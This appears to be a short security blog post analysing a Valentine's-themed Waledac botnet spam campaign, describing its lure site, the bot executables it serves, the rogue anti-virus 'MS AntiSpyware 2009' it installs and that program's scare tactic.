Just as Storm did about this time last year before Valentines day, the Waledac botnet is conducting a campaign with a love theme. As with past Waledac and Storm campaigns, the spam message consists of a short message and a link.
The link is to the website below, consisting of a line of text and an image. Obfuscated JavaScript code inserts an IFrame, which currently has no content but this could change to contain exploit code so visiting these sites is not recommended.
The image is linked to an executable file with varying names such as meandyou.exe, youandme.exe and love.exe. These files were very poorly detected by anti-virus programs. When run, this file installs the Waledac bot.
Shortly after the bot was installed it was instructed to download the rouge anti-virus program MS AntiSpyware 2009. Rogue anti-virus programs attempt to look and act like real anti virus/spyware programs but report false infection results. The rogue then refuses to remove them until the user has paid for the registered version.
After several minutes the Waledac bot begins to send spam. Surprisingly, at the same time the bot started spamming, MS AntiSpyware 2009 poped up the alert below, warning the user that they may be infected with software that 'may be used to organize massive SPAM attacks':
Perhaps that by making the user think that they are liable for any spam sent from their computer they are more likely to pay to activate the rogue anti-virus program.
Waledac is still a minor botnet in terms of the amount of spam it sends but if its campaigns prove successful, just as they were with Storm, it could become a much larger threat.
